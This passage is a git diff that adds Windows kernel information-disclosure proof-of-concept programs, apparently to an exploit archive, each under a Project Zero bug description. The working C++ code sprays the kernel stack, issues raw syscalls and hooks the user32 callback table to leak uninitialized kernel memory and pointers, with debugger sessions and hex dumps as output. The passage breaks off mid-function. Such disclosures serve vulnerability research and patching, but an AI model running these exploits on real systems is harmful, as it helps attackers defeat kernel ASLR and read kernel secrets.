42074,platforms/hardware/webapps/42074.txt,"D-Link DCS Series Cameras - Insecure Crossdomain",2017-02-22,SlidingWindow,hardware,webapps,0 42075,platforms/hardware/webapps/42075.txt,"QWR-1104 Wireless-N Router - Cross-Site Scripting",2017-05-26,"Touhid M.Shaikh",hardware,webapps,0 diff --git a/platforms/windows/dos/42223.cpp b/platforms/windows/dos/42223.cpp new file mode 100755 index 000000000..5e15f923e --- /dev/null +++ b/platforms/windows/dos/42223.cpp @@ -0,0 +1,81 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1178 + +We have discovered that it is possible to disclose portions of uninitialized kernel stack memory in Windows 7-10 through the win32k!NtGdiExtGetObjectW system call (accessible via a documented GetObject() API function) to user-mode applications. + +The reason for this seems to be as follows: logical fonts in Windows are described by the LOGFONT structure [1]. One of the structure's fields is lfFaceName, a 32-character array containing the typeface name. Usually when logical fonts are created (e.g. with the CreateFont() or CreateFontIndirect() user-mode functions), a large part of the array remains uninitialized, as most font names are shorter than the maximum length. For instance, the CreateFont() API only copies the relevant string up until \0, and leaves the rest of its local LOGFONT structure untouched. In case of CreateFontIndirect(), it is mostly up to the caller to make sure there are no leftover bytes in the structure, but we expect this is rarely paid attention to. The structure is then copied to kernel-mode address space, but can be read back using the GetObject() function, provided that the program has a GDI handle to the logical font. + +Now, it turns out that the trailing, uninitialized bytes of the LOGFONT structure for some of the stock fonts contain left-over kernel stack data, which include kernel pointers, among other potentially interesting information. An example output of the attached proof-of-concept program (which obtains and displays the LOGFONT of the DEVICE_DEFAULT_FONT stock font) started on Windows 7 32-bit is as follows: + +--- cut --- +00000000: 10 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 ................ +00000010: bc 02 00 00 00 00 00 ee 01 02 02 22 53 00 79 00 ..........."S.y. +00000020: 73 00 74 00 65 00 6d 00 00 00 29 92 24 86 6d 81 s.t.e.m...).$.m. +00000030: fb 4d f2 ad fe ff ff ff 63 76 86 81 76 79 86 81 .M......cv..vy.. +00000040: 10 38 c7 94 02 00 00 00 00 00 00 00 01 00 00 00 .8.............. +00000050: d0 03 69 81 10 38 c7 94 04 7a 00 00 ?? ?? ?? ?? ..i..8...z...... +--- cut --- + +After the "System" unicode string, we can observe data typical to a function stack frame: a _EH3_EXCEPTION_REGISTRATION structure at offset 0x28: + +.Next = 0x9229???? (truncated) +.ExceptionHandler = 0x816d8624 +.ScopeTable = 0xadf24dfb +.TryLevel = 0xfffffffe + +as well as pointers to the ntoskrnl.exe kernel image (0x81867663, 0x81867976, 0x816903d0) and paged pool (0x94c73810). This information is largely useful for local attackers seeking to defeat the kASLR exploit mitigation, and the bug might also allow disclosing other sensitive data stored in the kernel address space. We have confirmed that more data can be easily leaked by querying other stock fonts. It is unclear whether disclosing junk stack data from other user-mode processes which create logical fonts is possible, but this scenario should also be investigated and addressed if necessary. +*/ + +#include +#include + +VOID PrintHex(PBYTE Data, ULONG dwBytes) { + for (ULONG i = 0; i < dwBytes; i += 16) { + printf("%.8x: ", i); + + for (ULONG j = 0; j < 16; j++) { + if (i + j < dwBytes) { + printf("%.2x ", Data[i + j]); + } + else { + printf("?? "); + } + } + + for (ULONG j = 0; j < 16; j++) { + if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) { + printf("%c", Data[i + j]); + } + else { + printf("."); + } + } + + printf("\n"); + } +} + +int main() { + // Get a handle to the stock font. + HFONT hfont = (HFONT)GetStockObject(DEVICE_DEFAULT_FONT); + if (hfont == NULL) { + printf("GetCurrentObject failed\n"); + return 1; + } + + // Zero-out the logfont memory to prevent any artifacts in the output. + LOGFONT logfont; + RtlZeroMemory(&logfont, sizeof(logfont)); + + // Trigger the bug. + if (GetObject(hfont, sizeof(logfont), &logfont) == 0) { + printf("GetObject failed\n"); + DeleteObject(hfont); + return 1; + } + + // Dump the output on screen. + PrintHex((PBYTE)&logfont, sizeof(logfont)); + + return 0; +} diff --git a/platforms/windows/dos/42224.cpp b/platforms/windows/dos/42224.cpp new file mode 100755 index 000000000..3fb75b449 --- /dev/null +++ b/platforms/windows/dos/42224.cpp @@ -0,0 +1,117 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1179 + +We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7-10 through the win32k!NtGdiGetOutlineTextMetricsInternalW system call. + +The system call returns an 8-byte structure back to ring-3 through the 4th parameter, as evidenced by the following assembly code (win32k.sys from Windows 7 32-bit): + +--- cut --- +.text:BF87364A mov edx, [ebp+arg_C] +.text:BF87364D lea ecx, [edx+8] +.text:BF873650 mov eax, _W32UserProbeAddress +.text:BF873655 cmp ecx, eax +.text:BF873657 ja short loc_BF873662 +.text:BF873659 cmp ecx, edx +.text:BF87365B jbe short loc_BF873662 +.text:BF87365D test dl, 3 +.text:BF873660 jz short loc_BF873665 +.text:BF873662 +.text:BF873662 loc_BF873662: +.text:BF873662 mov byte ptr [eax], 0 +.text:BF873665 +.text:BF873665 loc_BF873665: +.text:BF873665 lea esi, [ebp+var_24] +.text:BF873668 mov edi, edx +.text:BF87366A movsd +.text:BF87366B movsd +--- cut --- + +However, according to our experiments, only the first 4 bytes of the source structure (placed on the kernel stack) are initialized under normal circumstances, while the other 4 bytes are set to leftover data. In order to demonstrate the issue, we have created a proof-of-concept program which sprays 1024 bytes of the kernel stack with a 0x41 ('A') byte directly prior to triggering the vulnerability, with the help of the win32k!NtGdiEngCreatePalette system call. Then, the DWORD leaked via the discussed vulnerability is indeed equal to 0x41414141, as evidenced by the PoC output: + +--- cut --- +C:\>NtGdiGetOutlineTextMetricsInternalW_stack.exe +Data read: 41414141 +--- cut --- + +Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space. +*/ + +#include +#include + +// For native 32-bit execution. +extern "C" +ULONG CDECL SystemCall32(DWORD ApiNumber, ...) { + __asm{mov eax, ApiNumber}; + __asm{lea edx, ApiNumber + 4}; + __asm{int 0x2e}; +} + +// Own implementation of memset(), which guarantees no data is spilled on the local stack. +VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) { + for (ULONG i = 0; i < size; i++) { + ptr[i] = byte; + } +} + +VOID SprayKernelStack() { + // Windows 7 32-bit. + CONST ULONG __NR_NtGdiEngCreatePalette = 0x129c; + + // Buffer allocated in static program memory, hence doesn't touch the local stack. + static BYTE buffer[1024]; + + // Fill the buffer with 'A's and spray the kernel stack. + MyMemset(buffer, 'A', sizeof(buffer)); + SystemCall32(__NR_NtGdiEngCreatePalette, 1, sizeof(buffer) / sizeof(DWORD), buffer, 0, 0, 0); + + // Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's. + MyMemset(buffer, 'B', sizeof(buffer)); +} + +int main() { + // Windows 7 32-bit. + CONST ULONG __NR_NtGdiGetOutlineTextMetricsInternalW = 0x10c6; + + // Create a Device Context. + HDC hdc = CreateCompatibleDC(NULL); + + // Create a TrueType font. + HFONT hfont = CreateFont(10, // nHeight + 10, // nWidth + 0, // nEscapement + 0, // nOrientation + FW_DONTCARE, // fnWeight + FALSE, // fdwItalic + FALSE, // fdwUnderline + FALSE, // fdwStrikeOut + ANSI_CHARSET, // fdwCharSet + OUT_DEFAULT_PRECIS, // fdwOutputPrecision + CLIP_DEFAULT_PRECIS, // fdwClipPrecision + DEFAULT_QUALITY, // fdwQuality + FF_DONTCARE, // fdwPitchAndFamily + L"Times New Roman"); + + // Select the font into the DC. + SelectObject(hdc, hfont); + + // Spray the kernel stack to get visible results. + SprayKernelStack(); + + // Read the 4 uninitialized kernel stack bytes and print them on screen. + DWORD output[2] = { /* zero padding */ }; + if (!SystemCall32(__NR_NtGdiGetOutlineTextMetricsInternalW, hdc, 0, NULL, output)) { + printf("NtGdiGetOutlineTextMetricsInternalW failed\n"); + DeleteObject(hfont); + DeleteDC(hdc); + return 1; + } + + printf("Data read: %x\n", output[1]); + + // Free resources. + DeleteObject(hfont); + DeleteDC(hdc); + + return 0; +} diff --git a/platforms/windows/dos/42225.cpp b/platforms/windows/dos/42225.cpp new file mode 100755 index 000000000..b62304814 --- /dev/null +++ b/platforms/windows/dos/42225.cpp @@ -0,0 +1,91 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1180 + +We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7 (other systems untested) through the win32k!NtGdiGetTextMetricsW system call. + +The output structure used by the syscall, according to various sources, is TMW_INTERNAL, which wraps the TEXTMETRICW and TMDIFF structures (see e.g. the PoC for issue #480 ). The disclosure occurs when the service is called against a Device Context with one of the stock fonts selected (we're using DEVICE_DEFAULT_FONT). Then, we can find 7 uninitialized kernel stack bytes at offsets 0x39-0x3f of the output buffer. An example output of the attached proof-of-concept program started on Windows 7 32-bit is as follows: + +--- cut --- +00000000: 10 00 00 00 0d 00 00 00 03 00 00 00 03 00 00 00 ................ +00000010: 00 00 00 00 07 00 00 00 0f 00 00 00 bc 02 00 00 ................ +00000020: 00 00 00 00 60 00 00 00 60 00 00 00 20 00 22 21 ....`...`... ."! +00000030: ac 20 20 00 00 00 00 21 ee[03 81 ff 35 64 36 8f]. ....!....5d6. +00000040: 20 ff 80 20 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? .. ............ +--- cut --- + +Here, the leaked bytes are "03 81 ff 35 64 36 8f". If we map the 0x39-0x3f offsets to the layout of the TMW_INTERNAL structure, it turns out that the 7 bytes in question correspond to the 3 alignments bytes past the end of TEXTMETRICSW (which itself has an odd length of 57 bytes), and the first 4 bytes of the TMDIFF structure. + +Triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space. +*/ + +#include +#include + +// For native 32-bit execution. +extern "C" +ULONG CDECL SystemCall32(DWORD ApiNumber, ...) { + __asm{mov eax, ApiNumber}; + __asm{lea edx, ApiNumber + 4}; + __asm{int 0x2e}; +} + +VOID PrintHex(PBYTE Data, ULONG dwBytes) { + for (ULONG i = 0; i < dwBytes; i += 16) { + printf("%.8x: ", i); + + for (ULONG j = 0; j < 16; j++) { + if (i + j < dwBytes) { + printf("%.2x ", Data[i + j]); + } + else { + printf("?? "); + } + } + + for (ULONG j = 0; j < 16; j++) { + if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) { + printf("%c", Data[i + j]); + } + else { + printf("."); + } + } + + printf("\n"); + } +} + +int main() { + // Windows 7 32-bit. + CONST ULONG __NR_NtGdiGetTextMetricsW = 0x10d9; + + // Create a Device Context. + HDC hdc = CreateCompatibleDC(NULL); + + // Get a handle to the stock font. + HFONT hfont = (HFONT)GetStockObject(DEVICE_DEFAULT_FONT); + if (hfont == NULL) { + printf("GetCurrentObject failed\n"); + return 1; + } + + // Select the font into the DC. + SelectObject(hdc, hfont); + + // Trigger the vulnerability and dump the kernel output on stdout. + BYTE output[0x44] = { /* zero padding */ }; + if (!SystemCall32(__NR_NtGdiGetTextMetricsW, hdc, output, sizeof(output))) { + printf("NtGdiGetTextMetricsW failed\n"); + DeleteObject(hfont); + DeleteDC(hdc); + return 1; + } + + PrintHex(output, sizeof(output)); + + // Free resources. + DeleteObject(hfont); + DeleteDC(hdc); + + return 0; +} diff --git a/platforms/windows/dos/42226.cpp b/platforms/windows/dos/42226.cpp new file mode 100755 index 000000000..60b1fedb7 --- /dev/null +++ b/platforms/windows/dos/42226.cpp @@ -0,0 +1,136 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1181 + +We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7-10 through the win32k!NtGdiGetRealizationInfo system call. + +The concrete layout of the input/output structure is unclear (symbols indicate its name is FONT_REALIZATION_INFO), but the first DWORD field contains the structure size, which can be either 16 or 24. The internal win32k!GreGetRealizationInfo function then initializes a local copy of the structure on the kernel stack with an adequate number of bytes. However, the syscall handler later copies the full 24 bytes of memory back to user-mode, regardless of the declared size of the structure, and the number of bytes initialized within it: + +--- cut --- +.text:BF86F307 mov edi, ecx +.text:BF86F309 +.text:BF86F309 loc_BF86F309: +.text:BF86F309 push 6 +.text:BF86F30B pop ecx +.text:BF86F30C lea esi, [ebp+var_30] +.text:BF86F30F rep movsd +--- cut --- + +In other words, if we pass in a structure with .Size set to 16, the kernel will leak 8 uninitialized stack bytes back to us. This condition is illustrated by the attached proof-of-concept program, which first sprays 1024 bytes of the kernel stack with the 0x41 ('A') value, and then invokes the affected system call. The result of starting the program on Windows 7 32-bit is as follows: + +--- cut --- +00000000: 10 00 00 00 03 01 00 00 2d 00 00 00 65 00 00 46 ........-...e..F +00000010: 41 41 41 41 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? AAAAAAAA........ +--- cut --- + +It is clearly visible that the 8 trailing bytes are set to the leftover 'A's artificially set up to demonstrate the security issue. + +Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space. +*/ + +#include +#include + +// For native 32-bit execution. +extern "C" +ULONG CDECL SystemCall32(DWORD ApiNumber, ...) { + __asm{mov eax, ApiNumber}; + __asm{lea edx, ApiNumber + 4}; + __asm{int 0x2e}; +} + +VOID PrintHex(PBYTE Data, ULONG dwBytes) { + for (ULONG i = 0; i < dwBytes; i += 16) { + printf("%.8x: ", i); + + for (ULONG j = 0; j < 16; j++) { + if (i + j < dwBytes) { + printf("%.2x ", Data[i + j]); + } + else { + printf("?? "); + } + } + + for (ULONG j = 0; j < 16; j++) { + if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) { + printf("%c", Data[i + j]); + } + else { + printf("."); + } + } + + printf("\n"); + } +} + +// Own implementation of memset(), which guarantees no data is spilled on the local stack. +VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) { + for (ULONG i = 0; i < size; i++) { + ptr[i] = byte; + } +} + +VOID SprayKernelStack() { + // Windows 7 32-bit. + CONST ULONG __NR_NtGdiEngCreatePalette = 0x129c; + + // Buffer allocated in static program memory, hence doesn't touch the local stack. + static BYTE buffer[1024]; + + // Fill the buffer with 'A's and spray the kernel stack. + MyMemset(buffer, 'A', sizeof(buffer)); + SystemCall32(__NR_NtGdiEngCreatePalette, 1, sizeof(buffer) / sizeof(DWORD), buffer, 0, 0, 0); + + // Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's. + MyMemset(buffer, 'B', sizeof(buffer)); +} + +int main() { + // Windows 7 32-bit. + CONST ULONG __NR_NtGdiGetRealizationInfo = 0x10cb; + + // Create a Device Context. + HDC hdc = CreateCompatibleDC(NULL); + + // Create a TrueType font. + HFONT hfont = CreateFont(10, // nHeight + 10, // nWidth + 0, // nEscapement + 0, // nOrientation + FW_DONTCARE, // fnWeight + FALSE, // fdwItalic + FALSE, // fdwUnderline + FALSE, // fdwStrikeOut + ANSI_CHARSET, // fdwCharSet + OUT_DEFAULT_PRECIS, // fdwOutputPrecision + CLIP_DEFAULT_PRECIS, // fdwClipPrecision + DEFAULT_QUALITY, // fdwQuality + FF_DONTCARE, // fdwPitchAndFamily + L"Times New Roman"); + + // Select the font into the DC. + SelectObject(hdc, hfont); + + // Spray the kernel stack to get visible results. + SprayKernelStack(); + + // Read the uninitialized kernel stack bytes and print them on screen. + DWORD output[6] = { /* zero padding */ }; + output[0] = 16; + + if (!SystemCall32(__NR_NtGdiGetRealizationInfo, hdc, output)) { + printf("NtGdiGetRealizationInfo failed\n"); + DeleteObject(hfont); + DeleteDC(hdc); + return 1; + } + + PrintHex((PBYTE)output, sizeof(output)); + + // Free resources. + DeleteObject(hfont); + DeleteDC(hdc); + + return 0; +} diff --git a/platforms/windows/dos/42227.cpp b/platforms/windows/dos/42227.cpp new file mode 100755 index 000000000..a010a983f --- /dev/null +++ b/platforms/windows/dos/42227.cpp @@ -0,0 +1,184 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1186 + +We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7 (other platforms untested) indirectly through the win32k!NtGdiOpenDCW system call. The analysis shown below was performed on Windows 7 32-bit. + +The full stack trace of where uninitialized kernel stack data is leaked to user-mode is as follows: + +--- cut --- +9706b8b4 82ab667d nt!memcpy+0x35 +9706b910 92bf8220 nt!KeUserModeCallback+0xc6 +9706b954 92c01d1f win32k!pppUserModeCallback+0x23 +9706b970 92c096c8 win32k!ClientPrinterThunk+0x41 +9706ba24 92b0c722 win32k!UMPDDrvEnablePDEV+0x18c +9706bc20 92b74bc4 win32k!PDEVOBJ::PDEVOBJ+0x1c5 +9706bca4 92b6b2a6 win32k!hdcOpenDCW+0x18c +9706bd0c 82876db6 win32k!NtGdiOpenDCW+0x112 +9706bd0c 77486c74 nt!KiSystemServicePostCall +0022fa18 772e9978 ntdll!KiFastSystemCallRet +0022fa1c 772e9a0e GDI32!NtGdiOpenDCW+0xc +0022fca8 772e9bab GDI32!hdcCreateDCW+0x1b1 +0022fcf4 772e9c5d GDI32!bCreateDCA+0xe4 +0022fd10 00405114 GDI32!CreateICA+0x18 +--- cut --- + +At the time of this callstack, the win32k!ClientPrinterThunk function invokes a user-mode callback #93 (corresponding to user32!__ClientPrinterThunk), and passes in an input structure of 0x6C bytes. We have found that 8 bytes at offset 0x4C and 12 bytes at offset 0x60 of that structure are uninitialized. We have tracked that this structure originates from the stack frame of the win32k!UMPDDrvEnablePDEV function, and is passed down to win32k!UMPDOBJ::Thunk in the 2nd argument. + +The uninitialized data can be obtained by a user-mode application by hooking the appropriate entry in the user32.dll callback dispatch table, and reading data from a pointer provided through the handler's parameter. This technique is illustrated by the attached proof-of-concept code (again, specific to Windows 7 32-bit). If we attach a WinDbg debugger to the tested system, we can set a breakpoint at the beginning of win32k!UMPDDrvEnablePDEV, manually initialize the overall structure copied to user-mode with a marker 0x41 ('A') byte after the stack frame allocation instructions, and then observe some of these bytes in the output of the PoC program. This indicates they were not initialized anywhere during execution between win32k!UMPDDrvEnablePDEV and nt!KeUserModeCallback(), and copied in the leftover form to user-mode. See below: + +--- cut --- +1: kd> ba e 1 win32k!UMPDDrvEnablePDEV +1: kd> g +Breakpoint 0 hit +win32k!UMPDDrvEnablePDEV: +9629957c 6a7c push 7Ch +0: kd> p +win32k!UMPDDrvEnablePDEV+0x2: +9629957e 68d0633796 push offset win32k!__safe_se_handler_table+0x7c98 (963763d0) +0: kd> p +win32k!UMPDDrvEnablePDEV+0x7: +96299583 e828b4f8ff call win32k!_SEH_prolog4 (962249b0) +0: kd> p +win32k!UMPDDrvEnablePDEV+0xc: +96299588 8d4de4 lea ecx,[ebp-1Ch] +0: kd> f ebp-8c ebp-8c+6c-1 41 +Filled 0x6c bytes +0: kd> g +--- cut --- + +After executing the above commands, the program should print output similar to the following: + +--- cut --- +[...] +00000000: 6c 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 l............... +00000010: 1c 03 11 59 d8 e2 31 00 74 02 c6 01 a8 06 c6 01 ...Y..1.t....... +00000020: 06 00 00 00 00 00 c3 01 30 01 00 00 18 00 c3 01 ........0....... +00000030: 2c 01 00 00 48 01 c3 01 30 21 a0 ff e4 06 c6 01 ,...H...0!...... +00000040: 84 9b 31 00 00 00 00 00 00 00 00 00 41 41 41 41 ..1.........AAAA +00000050: 41 41 41 41 74 02 c3 01 74 02 c4 01 74 02 c5 01 AAAAt...t...t... +00000060: 41 41 41 41 41 41 41 41 41 41 41 41 ?? ?? ?? ?? AAAAAAAAAAAA.... +[...] +--- cut --- + +It's clearly visible that bytes at offsets 0x4c-0x53 and 0x60-0x6b are equal to the data we set in the prologue of win32k!UMPDDrvEnablePDEV, which illustrates how uninitialized stack data is leaked to user-mode. + +If we skip the manual initialization of bytes in the stack frame with a kernel debugger, an example output of the program is as follows: + +--- cut --- +00000000: 6c 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 l............... +00000010: 75 03 11 55 d8 e2 25 00 74 02 96 01 a8 06 96 01 u..U..%.t....... +00000020: 06 00 00 00 00 00 93 01 30 01 00 00 18 00 93 01 ........0....... +00000030: 2c 01 00 00 48 01 93 01 30 21 a0 ff e4 06 96 01 ,...H...0!...... +00000040: 84 9b 25 00 00 00 00 00 00 00 00 00[96 6f 89 82]..%..........o.. +00000050:[28 65 9d 84]74 02 93 01 74 02 94 01 74 02 95 01 (e..t...t...t... +00000060: 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ................ +--- cut --- + +In the above listing, two kernel-mode addresses are leaked at offsets 0x4c and 0x50: an address of the ntoskrnl.exe image, and an address of a non-paged pool allocation: + +--- cut --- +0: kd> !address 849d6528 +[...] + +Usage: +Base Address: 84800000 +End Address: 84a00000 +Region Size: 00200000 +VA Type: NonPagedPool +VAD Address: 0x8800000067317cf2 +Commit Charge: 0x1000165643ec0 +Protection: 0x8800000067317cf0 [] +Memory Usage: Private +No Change: yes +More info: !vad 0x84800000 +0: kd> !address 82896f96 + + +Usage: Module +Base Address: 8281c000 +End Address: 82c38000 +Region Size: 0041c000 +VA Type: BootLoaded +Module name: ntoskrnl.exe +Module path: [\SystemRoot\system32\ntkrnlpa.exe] +--- cut --- + +Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space. +*/ + +#include +#include + +namespace globals { + LPVOID (WINAPI *OrigClientPrinterThunk)(LPVOID); +} // namespace globals; + +VOID PrintHex(PBYTE Data, ULONG dwBytes) { + for (ULONG i = 0; i < dwBytes; i += 16) { + printf("%.8x: ", i); + + for (ULONG j = 0; j < 16; j++) { + if (i + j < dwBytes) { + printf("%.2x ", Data[i + j]); + } + else { + printf("?? "); + } + } + + for (ULONG j = 0; j < 16; j++) { + if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) { + printf("%c", Data[i + j]); + } + else { + printf("."); + } + } + + printf("\n"); + } +} + +PVOID *GetUser32DispatchTable() { + __asm{ + mov eax, fs:30h + mov eax, [eax + 0x2c] + } +} + +BOOL HookUser32DispatchFunction(UINT Index, PVOID lpNewHandler, PVOID *lpOrigHandler) { + PVOID *DispatchTable = GetUser32DispatchTable(); + DWORD OldProtect; + + if (!VirtualProtect(DispatchTable, 0x1000, PAGE_READWRITE, &OldProtect)) { + printf("VirtualProtect#1 failed, %d\n", GetLastError()); + return FALSE; + } + + *lpOrigHandler = DispatchTable[Index]; + DispatchTable[Index] = lpNewHandler; + + if (!VirtualProtect(DispatchTable, 0x1000, OldProtect, &OldProtect)) { + printf("VirtualProtect#2 failed, %d\n", GetLastError()); + return FALSE; + } + + return TRUE; +} + +LPVOID WINAPI ClientPrinterThunkHook(LPVOID Data) { + printf("----------\n"); + PrintHex((PBYTE)Data, ((PDWORD)Data)[0]); + return globals::OrigClientPrinterThunk(Data); +} + +int main() { + if (!HookUser32DispatchFunction(93, ClientPrinterThunkHook, (PVOID *)&globals::OrigClientPrinterThunk)) { + return 1; + } + + HDC hic = CreateICA("Microsoft XPS Document Writer", "Microsoft XPS Document Writer", NULL, NULL); + DeleteDC(hic); + + return 0; +} diff --git a/platforms/windows/dos/42228.cpp b/platforms/windows/dos/42228.cpp new file mode 100755 index 000000000..98856b4dd --- /dev/null +++ b/platforms/windows/dos/42228.cpp @@ -0,0 +1,219 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1189&desc=2 + +We have discovered that the nt!NtQueryInformationJobObject system call (corresponding to the documented QueryInformationJobObject() API function) called with the JobObjectExtendedLimitInformation information class discloses portions of uninitialized kernel stack memory to user-mode clients, due to output structure alignment holes. + +On our test Windows 7 32-bit workstation, an example layout of the output buffer is as follows: + +--- cut --- +00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000020: 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ................ +00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +--- cut --- + +Where 00 denote bytes which are properly initialized, while ff indicate uninitialized values copied back to user-mode. The output data is returned in a JOBOBJECT_EXTENDED_LIMIT_INFORMATION structure [1]. If we map the above shadow bytes to the structure definition, it turns out that the uninitialized bytes correspond to the alignment hole between the end of the JOBOBJECT_BASIC_LIMIT_INFORMATION structure and the beginning of the adjacent IO_COUNTERS structure. The length of the former is 0x2C (44), while the latter must be 8-byte aligned, so there is a gap at offsets 0x2C-0x2F, which is not initialized by the kernel. + +The vulnerability can be easily demonstrated with a kernel debugger (WinDbg), by setting a breakpoint on nt!NtQueryInformationJobObject, manually filling out the structure memory with a marker byte (0x41), and then observing four of these bytes printed out by the attached proof-of-concept program: + +--- cut --- +2: kd> bp nt!NtQueryInformationJobObject +2: kd> g +Breakpoint 0 hit +nt!NtQueryInformationJobObject: +818d5891 6890010000 push 190h +3: kd> p +nt!NtQueryInformationJobObject+0x5: +818d5896 68e0cf6981 push offset nt! ?? ::FNODOBFM::`string'+0x6100 (8169cfe0) +3: kd> p +nt!NtQueryInformationJobObject+0xa: +818d589b e8b8dbdeff call nt!_SEH_prolog4 (816c3458) +3: kd> p +nt!NtQueryInformationJobObject+0xf: +818d58a0 33f6 xor esi,esi +3: kd> f ebp-18c ebp-18c+70-1 41 +Filled 0x70 bytes +3: kd> g +--- cut --- + +An example output on our test virtual machine is as follows: + +--- cut --- +00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000020: 00 00 00 00 20 00 00 00 05 00 00 00 41 41 41 41 .... .......AAAA +00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +--- cut --- + +Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space. + +################################################################################ + +Upon further investigation of the bug, we have determined the following: + +- Not only the JobObjectExtendedLimitInformation (9), but also the JobObjectBasicLimitInformation (2) information class is affected by the vulnerability. The issue is very similar in that it also leaks 4 uninitialized bytes of kernel stack at offset 0x2C of the output structure. Since both classes are handled by the same or very close code areas, we are treating both cases as the same bug. + +- Windows 10 (contrary to Windows 7) allows the output buffer for JobObjectExtendedLimitInformation to optionally be 120-bytes long instead of the typical 112. In that case, extra 4 kernel stack bytes are leaked at the end of the structure. + +- It is possible to demonstrate the bug without resorting to a kernel debugger, by using the nt!NtMapUserPhysicalPages system call to spray the kernel stack with a large number of controlled bytes, and then invoking the affected nt!NtQueryInformationJobObject syscall directly, instead of through the QueryInformationJobObject() API. + +To address all of the above new facts, I'm attaching a new proof-of-concept program, specific to Windows 10 1607 32-bit, which demonstrates the memory disclosure in all three possible settings: JobObjectBasicLimitInformation (output length 48), JobObjectExtendedLimitInformation (output length 112) and JobObjectExtendedLimitInformation (output length 120). An example output of the program is shown below: + +--- cut --- +JobObjectBasicLimitInformation: +00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000020: 00 00 00 00 00 00 00 00 05 00 00 00 41 41 41 41 ............AAAA +JobObjectExtendedLimitInformation (112): +00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000020: 00 00 00 00 00 00 00 00 05 00 00 00 41 41 41 41 ............AAAA +00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +JobObjectExtendedLimitInformation (120): +00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000020: 00 00 00 00 00 00 00 00 05 00 00 00 41 41 41 41 ............AAAA +00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000070: 00 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........ +--- cut --- +*/ + +#include +#include +#include + +extern "C" +ULONG WINAPI NtMapUserPhysicalPages( + PVOID BaseAddress, + ULONG NumberOfPages, + PULONG PageFrameNumbers +); + +// For native 32-bit execution. +extern "C" +ULONG CDECL SystemCall32(DWORD ApiNumber, ...) { + __asm{mov eax, ApiNumber}; + __asm{lea edx, ApiNumber + 4}; + __asm{int 0x2e}; +} + +VOID PrintHex(PBYTE Data, ULONG dwBytes) { + for (ULONG i = 0; i < dwBytes; i += 16) { + printf("%.8x: ", i); + + for (ULONG j = 0; j < 16; j++) { + if (i + j < dwBytes) { + printf("%.2x ", Data[i + j]); + } + else { + 